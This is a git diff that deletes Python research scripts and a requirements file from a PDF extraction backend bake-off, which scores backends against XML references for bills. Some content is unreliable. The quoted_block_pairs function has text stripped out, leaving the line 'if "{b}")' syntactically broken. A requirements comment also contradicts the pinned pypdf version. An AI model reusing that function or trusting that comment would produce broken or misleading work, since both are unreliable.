print(f" {'metric':6} {'control':6} {'delta':>9} {'threshold':>10} verdict") - for m, r in report["B0"].items(): - d = "n/a" if r["delta"] is None else f"{r['delta']:+.4f}" - fired = "FIRES" if r["fires"] else "DID NOT FIRE -> metric VOID" - print(f" {m:6} {r['control']:6} {d:>9} {r.get('threshold', 0):>10} {fired}") - - print("\nSeparability") - for r in report["separability"]: - if r.get("verdict") == "insufficient data": - print(f" {r['control']}: insufficient data") - continue - print( - f" {r['control']}: {r['own_metric']} {r['own_delta']:+.4f} vs " - f"{r['other_metric']} {r['other_delta']:+.4f} -> {r['verdict']}" - ) - - print(f"\nDelta = pdfminer - pdfium-wasm ({RESAMPLES} cluster resamples by bill, seed {SEED})") - print(f" {'metric':6} {'pdfium':>8} {'pdfmnr':>8} {'delta':>9} {'95% CI':>20} {'thresh':>7} verdict") - for m, s in report["delta"].items(): - if s["point"] is None: - print(f" {m:6} insufficient data") - continue - ci = f"[{s['ci'][0]:+.4f}, {s['ci'][1]:+.4f}]" - pw = means["pdfium-wasm"][m] - pm = means["pdfminer"][m] - a = " n/a" if pw is None else f"{pw:8.4f}" - b = " n/a" if pm is None else f"{pm:8.4f}" - n = f"{s['n_documents_differing']}/{s['n_documents']}" - print(f" {m:6} {a} {b} {s['point']:+9.4f} {ci:>20} {s['threshold']:>7} {n:>7} differ {s['verdict']}") - - print("\nB2/B5/B6 on the QUOTED-BLOCK stratum (reference is known-defective there,") - print("reported because the clean stratum above cannot discriminate at all):") - for m, s2 in report["delta_quoted_block_stratum"].items(): - if s2["point"] is None: - print(f" {m:6} insufficient data") - continue - ci = f"[{s2['ci'][0]:+.4f}, {s2['ci'][1]:+.4f}]" - n = f"{s2['n_documents_differing']}/{s2['n_documents']}" - print(f" {m:6} delta={s2['point']:+.4f} {ci:>20} {n:>7} differ") - - print(f"\nrepair delta on B1 (repaired - strict): {report['repair_delta_B1']}") - - dest = args.out or args.results.with_name(args.results.stem + f"_report_{args.mode}.json") - dest.write_text(json.dumps(report, indent=1)) - print(f"\nwrote {dest}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/report_phase1.py b/docs/research/pdf-backend-bakeoff/probes/report_phase1.py deleted file mode 100644 index 5c6718b1..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/report_phase1.py +++ /dev/null @@ -1,152 +0,0 @@ -"""Summarize Phase 1 results: calibration gate first, then per-backend, then per-bill. - -Reports the calibration gate before any ranking, because if the incumbent does not land -near ceiling through the neutral layer then nothing else in the file means anything. -""" - -from __future__ import annotations - -import argparse -import json -import statistics -from collections import defaultdict -from pathlib import Path - -INCUMBENT = "pdfium-native" - - -def agg(values: list[float]) -> str: - if not values: - return " n/a" - return f"{statistics.mean(values):.4f}" - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--results", type=Path, required=True) - ap.add_argument("--mode", default="both", choices=["strict", "repaired", "both"]) - args = ap.parse_args() - - data = json.loads(args.results.read_text()) - docs = data["documents"] - backends = data["backends"] - modes = ["strict", "repaired"] if args.mode == "both" else [args.mode] - - print(f"N = {len(docs)} documents, {len(backends)} backends\n") - - # ---- Gate 1: did every backend open every document? ---- - print("GATE 1 -- opens the corpus") - for b in backends: - errs = [k for k, v in docs.items() if "error" in v.get(b, {})] - n_ok = sum(1 for v in docs.values() if b in v and "error" not in v[b]) - print(f" {b:<15} {n_ok}/{len(docs)} opened" + (f" FAILURES: {errs}" if errs else "")) - print() - - # ---- Calibration gate (Trap 1) ---- - print("CALIBRATION GATE (Trap 1) -- the incumbent through the neutral layer") - for mode in modes: - f1s = [ - v[INCUMBENT][mode]["text_vs_xml"]["f1"] - for v in docs.values() - if INCUMBENT in v and "error" not in v[INCUMBENT] - ] - cons = [ - v[INCUMBENT][mode]["tree"]["conservation_holds"] - for v in docs.values() - if INCUMBENT in v and "error" not in v[INCUMBENT] - ] - print( - f" {mode:<9} text F1 mean={agg(f1s)} median={statistics.median(f1s):.4f} " - f"min={min(f1s):.4f} max={max(f1s):.4f} | conservation holds {sum(cons)}/{len(cons)}" - ) - print(" (ceiling is set by the PDF-vs-XML format gap, not by 1.0 -- see README)\n") - - # ---- Per-backend aggregate ---- - for mode in modes: - print(f"PER-BACKEND, mode={mode} (N={len(docs)})") - header = ( - f" {'backend':<15} {'textF1':>7} {'ln_recall':>10} {'ln_spur':>8} " - f"{'crumbs':>7} {'consv':>7} {'fontsep':>8} {'emptyfont':>10} {'extract_s':>10}" - ) - print(header) - for b in backends: - rows = [v[b] for v in docs.values() if b in v and "error" not in v[b]] - if not rows: - continue - f1 = [r[mode]["text_vs_xml"]["f1"] for r in rows] - lr = [r[mode]["line_numbers"]["recall"] for r in rows if r[mode]["line_numbers"]["recall"] is not None] - ls = [ - r[mode]["line_numbers"]["spurious_rate"] - for r in rows - if r[mode]["line_numbers"]["spurious_rate"] is not None - ] - bc = [r[mode]["breadcrumbs"]["agreement"] for r in rows if r[mode]["breadcrumbs"]["agreement"] is not None] - cs = [r[mode]["tree"]["conservation_holds"] for r in rows] - fs = [ - r["font_role"]["margin_vs_body_separation"] - for r in rows - if r["font_role"]["margin_vs_body_separation"] is not None - ] - ef = [ - r["font_role"]["empty_font_name_rate"] - for r in rows - if r["font_role"]["empty_font_name_rate"] is not None - ] - ex = [r["extract_s"] for r in rows] - print( - f" {b:<15} {agg(f1):>7} {agg(lr):>10} {agg(ls):>8} {agg(bc):>7} " - f"{sum(cs)}/{len(cs):<5} {agg(fs):>8} {agg(ef):>10} {sum(ex):>9.1f}" - ) - print() - - # ---- Strict vs repaired gap: the glyph-naming deficit ---- - print("GLYPH-NAMING DEFICIT (repaired F1 - strict F1; >0 means the backend could not") - print("name a glyph the position rule then recovered)") - for b in backends: - rows = [v[b] for v in docs.values() if b in v and "error" not in v[b]] - gaps = [r["repaired"]["text_vs_xml"]["f1"] - r["strict"]["text_vs_xml"]["f1"] for r in rows] - unnamed = [r["strict"]["reconstruction"]["unnamed_glyphs"] for r in rows] - n_affected = sum(1 for g in gaps if g > 1e-9) - print( - f" {b:<15} mean_gap={statistics.mean(gaps):+.4f} max_gap={max(gaps):+.4f} " - f"docs_affected={n_affected}/{len(gaps)} unnamed_glyphs={sum(unnamed)}" - ) - print() - - # ---- LCS cross-check: does the multiset substitution change anything? ---- - deltas = [] - for v in docs.values(): - for b in backends: - r = v.get(b, {}) - if "error" in r: - continue - for mode in ("strict", "repaired"): - lcs = r[mode].get("text_vs_xml_lcs") - if lcs: - deltas.append(abs(lcs["f1"] - r[mode]["text_vs_xml"]["f1"])) - if deltas: - print("METRIC AUDIT -- multiset F1 vs order-sensitive LCS F1, where both computable") - print( - f" n={len(deltas)} comparisons, mean |delta|={statistics.mean(deltas):.5f}, max |delta|={max(deltas):.5f}" - ) - print() - - # ---- Per-bill, so one bill cannot drive the headline ---- - print("PER-BILL text F1 (repaired), so no single bill drives the aggregate") - by_bill: dict[str, dict[str, list[float]]] = defaultdict(lambda: defaultdict(list)) - for key, v in docs.items(): - bill = key.split("/")[0] - for b in backends: - if b in v and "error" not in v[b]: - by_bill[bill][b].append(v[b]["repaired"]["text_vs_xml"]["f1"]) - print(f" {'bill':<16} {'n':>3} " + " ".join(f"{b[:11]:>11}" for b in backends)) - for bill in sorted(by_bill): - n = max(len(by_bill[bill][b]) for b in backends) - cells = " ".join( - f"{statistics.mean(by_bill[bill][b]):>11.4f}" if by_bill[bill][b] else f"{'n/a':>11}" for b in backends - ) - print(f" {bill:<16} {n:>3} {cells}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/report_phase2.py b/docs/research/pdf-backend-bakeoff/probes/report_phase2.py deleted file mode 100644 index c2b2996b..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/report_phase2.py +++ /dev/null @@ -1,181 +0,0 @@ -"""Summarize Phase 2: the terminal metric, per bill and per backend. - -Reports T4 (backend vs incumbent, PDF side only) most prominently, because it is the -only measurement here in which a difference is unambiguously attributable to the backend. -T1/T2 compare two different artifacts of one bill version, so their disagreement mixes -the three causes Trap 2 names and cannot separate them. -""" - -from __future__ import annotations - -import argparse -import json -import statistics -from collections import defaultdict -from pathlib import Path - -INCUMBENT = "pdfium-native" - - -def mean(xs): - return statistics.mean(xs) if xs else float("nan") - - -def quoted_block_pairs() -> set[str]: - """Pairs whose XML reference is compromised by the known parser drop. - - The parser drops , so on an amendment bill the XML side UNDER-reports - content (tracked as DeltaTrack#11). That makes the XML an unreliable reference on - those pairs, and it fails in a known direction: a PDF-vs-XML disagreement there is - presumptively the XML's, which is Trap 2's cause #2 rather than a backend error. - Detected from the fixture files rather than hardcoded, so the set cannot drift. - """ - import sys as _sys - - _sys.path.insert(0, str(Path(__file__).resolve().parent)) - from score_phase2 import corpus_pairs - - out = set() - for bill, a, b, _p1, _p2, x1, x2 in corpus_pairs(): - if "{b}") - return out - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--results", type=Path, required=True) - ap.add_argument("--mode", default="repaired") - args = ap.parse_args() - - data = json.loads(args.results.read_text()) - pairs = data["pairs"] - backends = data["backends"] - mode = args.mode - - done = {k: v for k, v in pairs.items() if any(f"/{mode}" in s for s in v)} - print(f"N = {len(done)} pairs scored (of {data['n_pairs']}), mode={mode}\n") - - def cell(pair, backend, *keys): - e = pairs[pair].get(f"{backend}/{mode}") - if not e or "error" in e: - return None - for k in keys: - e = e.get(k) if isinstance(e, dict) else None - if e is None: - return None - return e - - # ---- T4 first: the sharp instrument ---- - print("T4 -- BACKEND vs INCUMBENT, PDF side only (downstream pipeline held fixed,") - print(" so any difference is attributable to the backend, no adjudication needed)") - print(f" {'backend':<15} {'amounts identical':>18} {'changes identical':>18} {'amount F1':>10} {'change F1':>10}") - for b in backends: - if b == INCUMBENT: - print(f" {b:<15} {'(reference)':>18} {'(reference)':>18} {'-':>10} {'-':>10}") - continue - ai = [cell(p, b, "T4_vs_incumbent", "identical_amounts") for p in done] - ci = [cell(p, b, "T4_vs_incumbent", "identical_changes") for p in done] - af = [cell(p, b, "T4_vs_incumbent", "amount_entries", "f1") for p in done] - cf = [cell(p, b, "T4_vs_incumbent", "change_signatures", "f1") for p in done] - ai = [x for x in ai if x is not None] - ci = [x for x in ci if x is not None] - af = [x for x in af if x is not None] - cf = [x for x in cf if x is not None] - print( - f" {b:<15} {f'{sum(ai)}/{len(ai)}':>18} {f'{sum(ci)}/{len(ci)}':>18} {mean(af):>10.4f} {mean(cf):>10.4f}" - ) - print() - - # ---- T2: money agreement vs XML, the structure-free oracle ---- - # - # STRATIFIED, because an unstratified mean here is misleading in both directions. - # Three populations are mixed together: - # * pairs where BOTH sides found zero amount entries -- F1 is trivially 1.0 and - # carries no information; - # * pairs where the XML found zero and the PDF found some -- F1 is 0.0 by empty - # denominator, which is not a backend failure; - # * pairs with a real amount population on both sides -- the only informative ones. - # A single mean over all three is dominated by which degenerate cases happen to be in - # the corpus. - qb = quoted_block_pairs() - print("T2 -- amount_entries agreement vs the XML pipeline (structure-free), STRATIFIED") - - def strat(p, b): - e = cell(p, b, "T2_amount_entries", "f1") - n_ref = cell(p, b, "T2_amount_entries", "n_reference") - n_cand = cell(p, b, "T2_amount_entries", "n_candidate") - if e is None: - return None, None - if not n_ref and not n_cand: - return "empty_both", e - if not n_ref: - return "xml_found_none", e - return ("substantive_qb" if p in qb else "substantive_clean"), e - - for label in ("substantive_clean", "substantive_qb", "xml_found_none", "empty_both"): - pairs_in = [p for p in done if strat(p, INCUMBENT)[0] == label] - if not pairs_in: - continue - note = { - "substantive_clean": "real amounts, XML reference SOUND -- the informative population", - "substantive_qb": "real amounts, XML reference carries (known parser drop)", - "xml_found_none": "XML found no amount entries; F1 is an empty-denominator artifact", - "empty_both": "neither side found amounts; F1 trivially 1.0, carries no information", - }[label] - print(f"\n [{label}] n={len(pairs_in)} -- {note}") - print(f" {'backend':<15} {'meanF1':>8} {'minF1':>8} {'perfect':>9}") - for b in backends: - f1 = [x for x in (cell(p, b, "T2_amount_entries", "f1") for p in pairs_in) if x is not None] - if not f1: - continue - print(f" {b:<15} {mean(f1):>8.4f} {min(f1):>8.4f} {f'{sum(1 for x in f1 if x == 1.0)}/{len(f1)}':>9}") - print() - - # ---- T1: change signatures, reported as CONTEXT not as a score ---- - print("T1 -- change-signature agreement vs XML. Reported as CONTEXT, not as a score:") - print(" the two pipelines segment provisions differently by design (blocks vs") - print(" elements), so this number measures the format gap, not the backend.") - print(f" {'backend':<15} {'meanF1':>8} {'mean n_changes pdf':>20} {'xml':>8}") - for b in backends: - f1 = [x for x in (cell(p, b, "T1_change_signatures", "f1") for p in done) if x is not None] - np_ = [x for x in (cell(p, b, "context", "n_changes_pdf") for p in done) if x is not None] - nx = [x for x in (cell(p, b, "context", "n_changes_xml") for p in done) if x is not None] - if not f1: - continue - print(f" {b:<15} {mean(f1):>8.4f} {mean(np_):>20.0f} {mean(nx):>8.0f}") - print() - - # ---- per bill ---- - print("PER-BILL amount_entries F1 vs XML (repaired), so no bill drives the headline") - by_bill: dict[str, dict[str, list[float]]] = defaultdict(lambda: defaultdict(list)) - for p in done: - bill = p.split("/")[0] - for b in backends: - v = cell(p, b, "T2_amount_entries", "f1") - if v is not None: - by_bill[bill][b].append(v) - print(f" {'bill':<16} {'n':>2} " + " ".join(f"{b[:11]:>11}" for b in backends)) - for bill in sorted(by_bill): - n = max(len(by_bill[bill][b]) for b in backends) - cells = " ".join(f"{mean(by_bill[bill][b]):>11.4f}" if by_bill[bill][b] else f"{'n/a':>11}" for b in backends) - print(f" {bill:<16} {n:>2} {cells}") - print() - - # ---- amount disagreements vs the incumbent, listed for adjudication ---- - print("GATE 5 candidates -- pairs where a backend's amount_entries differ from the") - print("incumbent's. Held-fixed pipeline, so each is a real backend difference.") - any_found = False - for b in backends: - if b == INCUMBENT: - continue - bad = [p for p in done if cell(p, b, "T4_vs_incumbent", "identical_amounts") is False] - if bad: - any_found = True - print(f" {b}: {len(bad)} pair(s) -- {bad}") - if not any_found: - print(" none") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/requirements.txt b/docs/research/pdf-backend-bakeoff/probes/requirements.txt deleted file mode 100644 index 0c779c05..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/requirements.txt +++ /dev/null @@ -1,29 +0,0 @@ -# Benchmark-only dependencies for the PDF backend bake-off. -# -# DELIBERATELY NOT IN pyproject.toml. These are candidates under test, not product -# dependencies, and one of them (PyMuPDF) is AGPL-3.0 and must never reach the -# distributed dependency set -- it is present as a CEILING REFERENCE only, per the -# project distribution policy recorded in ../LICENSING.md. -# -# Pinned to the versions the published numbers were produced with. Several results are -# version-sensitive (pdfminer.six's LTChar geometry, PyMuPDF's rawdict shape), so a -# re-run on different versions may legitimately differ and should say so. -# -# ONE EXCEPTION, and it is deliberate: pypdf is 6.15.0 below, while every published pypdf -# number was produced on 6.14.2 -- which is what README.md's version table still records, -# correctly, because that table is a statement about history. 6.14.2 carries two moderate -# advisories (GHSA-fp3f-mc75-235c, GHSA-fwg2-594c-jp42; both resource exhaustion on hostile -# input, both fixed in 6.15.0), so the pin moved for SECURITY. Nothing was re-run and no -# published number changed. -# -# So do not "correct" that table to match this pin. A re-run today does not reproduce the -# pypdf column on the version that produced it, and any pypdf difference should be -# attributed to that before anything else. -# -# Install: -# uv pip install --python .venv/bin/python -r docs/research/pdf-backend-bakeoff/probes/requirements.txt - -pdfminer.six==20260107 -pypdf==6.19.0 -pymupdf==1.28.0 # AGPL-3.0 -- ceiling reference only, never shippable -playwright==1.60.0 # egress harness; also needs: python -m playwright install chromium diff --git a/docs/research/pdf-backend-bakeoff/probes/score_confirmatory.py b/docs/research/pdf-backend-bakeoff/probes/score_confirmatory.py deleted file mode 100644 index 03fba473..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_confirmatory.py +++ /dev/null @@ -1,219 +0,0 @@ -"""Concern B scoring for the confirmatory run, over one frozen population at a time. - -PRE-REGISTRATION-CONFIRMATORY.md. Emits per-document, per-backend, per-mode B1/B2/B3a/B5/B6 -plus the B0 sabotage rows, into one raw JSON file per population. Computes no statistics and -draws no conclusion -- report_confirmatory.py does that from this output. - - --population p1 the 52-document replication corpus (tests/corpus) - --population p2 the holdout, read from results/holdout_membership.json - -Two candidates plus the incumbent are extracted (pdfium-native is carried for Concern A and -for the strict/repaired repair-delta, never as a Concern B reference). Sabotage variants -reuse the base backend's already-extracted glyphs, so B0 costs reconstruction, not extraction. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_confirmatory.py \ - --population p1 --out docs/research/pdf-backend-bakeoff/results/confirm_p1.json -""" - -from __future__ import annotations - -import argparse -import json -import sys -import time -import traceback -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -import confirm_sabotage as SAB # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase1 import ( # noqa: E402 - align_to_body, - corpus_documents, - normalize_for_text_compare, - token_f1, - xml_body_tokens, -) - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 - -CANDIDATES = ("pdfium-wasm", "pdfminer") -SABOTAGE_BASE = "pdfium-wasm" -EXTRACT = ("pdfium-native",) + CANDIDATES -MODES = ("strict", "repaired") - - -def p2_documents(membership: Path) -> list[tuple[str, int, Path, Path]]: - """The 44 holdout documents named by the frozen membership. - - The holdout files are fetched rather than committed (`probes/fetch_holdout.py`), so a - tree where nobody has run the fetcher is the ORDINARY state, not an exotic one. This - used to skip any document whose files were absent, which meant that tree scored zero - documents, wrote a well-formed results file and exited 0 -- a vacuous pass in the exact - place the confirmatory run's holdout arm lives. Missing files now raise. - """ - doc = json.loads(membership.read_text()) - root = REPO / "docs/research/pdf-backend-bakeoff/holdout" - out, missing = [], [] - for m in doc["members"]: - for v in m["versions"]: - pdf = root / m["bill_id"] / Path(v["pdf"]["path"]).name - xml = root / m["bill_id"] / Path(v["xml"]["path"]).name - missing.extend(str(p.relative_to(root)) for p in (pdf, xml) if not p.exists()) - out.append((m["bill_id"], v["index"], pdf, xml)) - if missing: - raise SystemExit( - f"{len(missing)} of {2 * len(out)} holdout files are missing, so the P2 population " - f"cannot be scored. Restore them first:\n" - f" .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py\n" - f"first missing: {', '.join(missing[:4])}" - ) - expected = doc["n_documents"] - if len(out) != expected: - raise SystemExit(f"membership names {len(out)} documents, its own n_documents says {expected}") - return out - - -def score_pages(pages, xml_tokens, ref, scored_pages) -> dict: - tokens = normalize_for_text_compare("\n".join(p.text for p in pages)) - aligned, align_info = align_to_body(xml_tokens, tokens) - pdf_struct = M.pdf_structure(pages) - return { - "B1": token_f1(xml_tokens, aligned), - "B2": M.b2_heading_labels(pdf_struct, ref), - "B3a": M.b3a_line_number_self_consistency(pages, scored_pages), - "B5": M.b5_amount_association(pdf_struct, ref), - "B6": M.b6_parent_child(pdf_struct, ref), - "alignment": align_info, - "n_anchors": pdf_struct["n_anchors"], - "n_pages": len(pages), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--population", choices=("p1", "p2"), required=True) - ap.add_argument("--out", type=Path, required=True) - ap.add_argument("--limit-docs", type=int, default=None) - args = ap.parse_args() - - if args.population == "p1": - docs = corpus_documents() - else: - docs = p2_documents(REPO / "docs/research/pdf-backend-bakeoff/results/holdout_membership.json") - if args.limit_docs: - docs = docs[: args.limit_docs] - print(f"population {args.population}: {len(docs)} documents", file=sys.stderr) - - out: dict = { - "population": args.population, - "n_documents": len(docs), - "candidates": list(CANDIDATES), - "sabotage_base": SABOTAGE_BASE, - "seed": SAB.SEED, - "documents": {}, - } - args.out.parent.mkdir(parents=True, exist_ok=True) - - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - entry: dict = { - "bill": bill, - "version": version, - "pdf": str(pdf.relative_to(REPO)) if pdf.is_relative_to(REPO) else str(pdf), - } - t0 = time.perf_counter() - try: - xml_tokens = xml_body_tokens(xml) - ref = M.xml_reference(xml) - entry["quoted_block"] = M.xml_has_quoted_block(xml) - entry["xml_headings"] = len(ref["labels"]) - entry["xml_amounts"] = sum(ref["amounts"].values()) - except Exception as exc: - entry["error"] = f"xml: {type(exc).__name__}: {exc}" - out["documents"][key] = entry - print(f" [{i}/{len(docs)}] {key:<28} XML ERROR {exc}", file=sys.stderr) - args.out.write_text(json.dumps(out, indent=1, default=str)) - continue - - raw: dict = {} - for b in EXTRACT: - try: - raw[b] = run_backend(b, pdf)[0] - except Exception as exc: - entry.setdefault("backend_errors", {})[b] = f"{type(exc).__name__}: {exc}" - print(f" {b} EXTRACT ERROR: {exc}", file=sys.stderr) - - # Sabotage variants derive from one candidate's glyphs, no re-extraction. - variants: dict = {b: raw[b] for b in raw} - if SABOTAGE_BASE in raw: - for sid, (fn, _metric) in SAB.B_SABOTAGES.items(): - try: - variants[sid] = fn(raw[SABOTAGE_BASE]) - except Exception as exc: - entry.setdefault("sabotage_errors", {})[sid] = f"{type(exc).__name__}: {exc}" - print(f" {sid} SABOTAGE ERROR: {exc}", file=sys.stderr) - - # Reconstruct everything first: B3a's page set is the UNION of pages any variant - # could number, so no backend is scored on a page nobody can number, and a page one - # backend CAN number counts against those that cannot. - recon: dict = {} - for name, pages_raw in variants.items(): - for mode in MODES: - try: - recon[(name, mode)] = reconstruct(pages_raw, repaired=(mode == "repaired"))[0] - except Exception as exc: - entry.setdefault("reconstruct_errors", {})[f"{name}/{mode}"] = str(exc) - - # Union over the REAL backends only. Including sabotage variants lets a control - # change the population it is controlling: S4 moves heading glyphs between pages, - # which added pages to the union and moved the untouched base backend's B3a from - # 1.0000 to 0.9891 without anything about that backend having changed. - union_pages = { - mode: set().union( - *[M.numbered_pages(pg) for (n, m), pg in recon.items() if m == mode and n in raw] or [set()] - ) - for mode in MODES - } - - results: dict = {} - for name in variants: - per_mode = {} - for mode in MODES: - pages = recon.get((name, mode)) - if pages is None: - continue - try: - per_mode[mode] = score_pages(pages, xml_tokens, ref, union_pages[mode]) - except Exception as exc: - per_mode[mode] = { - "error": f"{type(exc).__name__}: {exc}", - "traceback": traceback.format_exc()[-800:], - } - if name in raw: - pages = recon.get((name, "repaired")) - per_mode["production_accepted"] = (not _is_unnumbered_layout(pages)) if pages else None - results[name] = per_mode - entry["results"] = results - entry["elapsed_s"] = round(time.perf_counter() - t0, 2) - - out["documents"][key] = entry - args.out.write_text(json.dumps(out, indent=1, default=str)) - b1 = { - n: results[n].get("strict", {}).get("B1", {}).get("f1") for n in ("pdfium-wasm", "pdfminer") if n in results - } - print(f" [{i}/{len(docs)}] {key:<28} {entry['elapsed_s']:>6.1f}s B1(strict)={b1}", file=sys.stderr) - - print(f"wrote {args.out}", file=sys.stderr) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/score_hybrid.py b/docs/research/pdf-backend-bakeoff/probes/score_hybrid.py deleted file mode 100644 index 5f272b19..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/score_hybrid.py +++ /dev/null @@ -1,281 +0,0 @@ -"""Does the hybrid indexed-text+geometry path reproduce PRODUCTION, and is it accurate? - -Two references, kept apart, because they answer different questions and a single number -would let one hide the other: - - vs PRODUCTION (`parsers/pdf_text.extract_clean_pages`) -- MIGRATION parity. Answers - "would moving the PDF adapter to this contract change what a staffer sees today?" - Reproducing production exactly is evidence about risk, never about correctness. - - vs XML -- ACCURACY. Answers "is the agreement above agreement on the right answer?" - Without this, a path that reproduced production's mistakes would score perfectly. - -Paths scored, all through the SAME downstream engine (`extract_anchors`, -`_pdf_tree_payload`, `diff_pdfs`, `pdf_diff_to_canonical`): - - production PDFium text API + the string pipeline (what ships today) - glyph PDFium glyph geometry + neutral reconstruction (the bake-off's seam) - hybrid PDFium indexed char stream + per-index geometry (the layer under test) - pdfminer pdfminer.six glyph geometry + neutral reconstruction (the neutral control) - -Per-document metrics, all named in the request: - - H1 full normalized text identity, then token F1 when it is not identical - H2 heading labels exact set match, and the two error directions - H3 heading tree / breadcrumbs heading -> parent-heading map agreement - H4 line numbers exact (page, line-number) set identity - H5 amount -> heading association agreement over the shared amount multiset - H6 canonical diff amount and change signatures, per pair (see --pairs) - -Production code is imported, never modified. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_hybrid.py \ - --out docs/research/pdf-backend-bakeoff/results/hybrid_docs.json - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/score_hybrid.py --pairs \ - --out docs/research/pdf-backend-bakeoff/results/hybrid_pairs.json -""" - -from __future__ import annotations - -import argparse -import hashlib -import json -import sys -import time -import traceback -from collections import Counter -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(PROBES / "backends"), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -import pdfium_hybrid # noqa: E402 -import reconstruct_hybrid as RH # noqa: E402 -from contract import run_backend # noqa: E402 -from reconstruct import reconstruct as reconstruct_glyph # noqa: E402 -from score_phase1 import corpus_documents # noqa: E402 -from score_phase2 import amount_triples, change_signatures, corpus_pairs # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.diff_pdf import diff_pdfs # noqa: E402 -from deltatrack.formatters.canonical import pdf_diff_to_canonical # noqa: E402 -from deltatrack.parsers.pdf_text import extract_clean_pages, pdf_full_text # noqa: E402 - -PATHS = ("production", "glyph", "hybrid", "pdfminer") - - -def build_pages(path: str, pdf: Path): - if path == "production": - return extract_clean_pages(pdf), {} - if path == "hybrid": - raw, summary = pdfium_hybrid.extract(pdf) - pages, diag = RH.reconstruct(raw) - return pages, {**summary, **diag} - backend = "pdfium-native" if path == "glyph" else "pdfminer" - raw, summary = run_backend(backend, pdf) - pages, diag = reconstruct_glyph(raw, repaired=True) - return pages, {**summary, **diag} - - -def _tokens(text: str) -> list[str]: - return text.split() - - -def _token_f1(a: list[str], b: list[str]) -> float: - """Bag-of-tokens F1. Order-insensitive on purpose: H1 asks whether the same WORDS were - recovered. Ordering is H4's and H6's business, and a sequence matcher on a 180k-token - enrolled bill costs more than the answer is worth.""" - ca, cb = Counter(a), Counter(b) - hit = sum((ca & cb).values()) - if not hit: - return 0.0 - p, r = hit / max(len(b), 1), hit / max(len(a), 1) - return round(2 * p * r / (p + r), 5) - - -def doc_facts(pages) -> dict: - text, _ = pdf_full_text(pages) - return { - "text": text, - "text_sha256": hashlib.sha256(text.encode()).hexdigest(), - "line_numbers": sorted( - (p.page_number, ln.line_number) for p in pages for ln in p.print_lines if ln.line_number is not None - ), - "structure": M.pdf_structure(pages), - "declined": _is_unnumbered_layout(pages), - } - - -def compare_to(cand: dict, ref: dict) -> dict: - """Every H-metric of one path against one reference path.""" - c_lab, r_lab = cand["structure"]["labels"], ref["structure"]["labels"] - c_par, r_par = cand["structure"]["parent"], ref["structure"]["parent"] - shared = c_lab & r_lab - par_agree = sum(1 for lab in shared if c_par.get(lab, "") == r_par.get(lab, "")) - - shared_amt = set(cand["structure"]["amounts"] & ref["structure"]["amounts"]) - ca = Counter({k: v for k, v in cand["structure"]["assoc"].items() if k[0] in shared_amt}) - ra = Counter({k: v for k, v in ref["structure"]["assoc"].items() if k[0] in shared_amt}) - assoc_hit = sum((ca & ra).values()) - - return { - "H1_text_identical": cand["text_sha256"] == ref["text_sha256"], - "H1_token_f1": _token_f1(_tokens(ref["text"]), _tokens(cand["text"])), - "H2_labels_exact": c_lab == r_lab, - "H2_labels_reference": len(r_lab), - "H2_labels_candidate": len(c_lab), - "H2_absent_from_reference": len(c_lab - r_lab), - "H2_missed_from_reference": len(r_lab - c_lab), - "H2_sample_absent": sorted(c_lab - r_lab)[:5], - "H3_breadcrumb_shared": len(shared), - "H3_breadcrumb_agree": par_agree, - "H3_breadcrumb_accuracy": round(par_agree / len(shared), 5) if shared else None, - "H4_line_numbers_identical": cand["line_numbers"] == ref["line_numbers"], - "H4_line_numbers_reference": len(ref["line_numbers"]), - "H4_line_numbers_candidate": len(cand["line_numbers"]), - "H4_line_numbers_jaccard": ( - round( - len(set(cand["line_numbers"]) & set(ref["line_numbers"])) - / len(set(cand["line_numbers"]) | set(ref["line_numbers"])), - 5, - ) - if (cand["line_numbers"] or ref["line_numbers"]) - else None - ), - "H5_assoc_reference": sum(ra.values()), - "H5_assoc_agree": assoc_hit, - "H5_assoc_accuracy": round(assoc_hit / sum(ra.values()), 5) if sum(ra.values()) else None, - } - - -def score_documents(out_path: Path, limit: int | None) -> None: - docs = corpus_documents() - if limit: - docs = docs[:limit] - rows = [] - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - t0 = time.perf_counter() - entry: dict = {"doc": key, "quoted_block": M.xml_has_quoted_block(xml)} - facts: dict = {} - for path in PATHS: - try: - pages, summary = build_pages(path, pdf) - facts[path] = doc_facts(pages) - entry.setdefault("extract", {})[path] = summary - except Exception as exc: # noqa: BLE001 - entry.setdefault("errors", {})[path] = f"{type(exc).__name__}: {exc}" - print(traceback.format_exc()[-800:], file=sys.stderr) - if "production" in facts: - entry["production_declined"] = facts["production"]["declined"] - entry["vs_production"] = { - p: compare_to(facts[p], facts["production"]) for p in PATHS if p != "production" and p in facts - } - try: - ref = M.xml_reference(xml) - entry["vs_xml"] = { - p: { - "B2": M.b2_heading_labels(facts[p]["structure"], ref), - "B5": M.b5_amount_association(facts[p]["structure"], ref), - 